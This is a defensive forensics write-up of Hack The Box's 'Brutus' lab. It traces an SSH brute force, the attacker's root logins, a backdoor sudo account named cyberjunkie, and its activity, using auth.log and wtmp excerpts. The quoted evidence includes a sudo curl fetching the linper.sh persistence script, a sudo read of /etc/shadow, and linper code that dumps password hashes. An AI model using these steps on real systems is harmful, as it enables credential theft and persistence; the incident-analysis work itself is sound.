🏹
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
grep -oE '[0-9]{1,3}(\.[0-9]{1,3}){3}' auth.log | sort | uniq -c | sort -nr
214 65.2.161.68
1 203.101.190.9
1 172.31.35.2865.2.161.68 returns the highest count (214)
65.2.161.68The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
$grep "Accept" auth.log
Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2
Mar 6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2root logins were successful
rootCan you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
First, decode the wtmp file with utmpdump
utmpdump wtmp > wtmp_logs.txtDecoding the wtmp file
Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2auth.log
[7] [02549] [ts/1] [root ] [pts/1 ] [65.2.161.68 ] [65.2.161.68 ] [2024-03-06T06:32:45,387923+00:00]wtmp_logs.txt
The wtmp file indicates that at 2024-03-06T06:32:45, a shell was spawned.
2024-03-06 06:32:45SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.auth.log: Note session number
37The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar 6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar 6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
<snip>
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
<snip>
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
Mar 6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
<snip>
Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.shauth.log: Logs of cyberjunkie and account’s activities
cyberjunkie user and groups created, cyberjunkie added to sudo group, indicating persistence
cyberjunkieWhat is the MITRE ATT&CK sub-technique ID used for persistence?
T1136.001Persistence + Local Account Sub technique Create Account, Technique T1136 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/techniques/T1136/ Checkout Sub Technique
How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
Calculate time difference between session start (wtmp) to session end (auth.log)
279The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.shView the COMMAND block
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.shSolved Brutus from Hack The Box! https://labs.hackthebox.com/achievement/sherlock/900392/631
Linper.sh
linper/linper.sh at main · montysecurity/linper https://github.com/montysecurity/linper/blob/main/linper.sh Looking through this script, it looks like a tool for post exploitation to scan and assist the user to maintain persistence in the machine. Take a look!
shadow() {
if $(find /etc/shadow -readable | grep -qi shadow)
then
if [ "$DRYRUN" -eq 0 ];
then
echo -e "\e[92m[+]\e[0m Accounts with Passwords from /etc/shadow"
egrep -v "\*|\!" /etc/shadow
else
echo -e "\e[92m[+]\e[0m You Can Read /etc/shadow"
fi
echo "-----------------------"
fi
}You Can Read /etc/shadow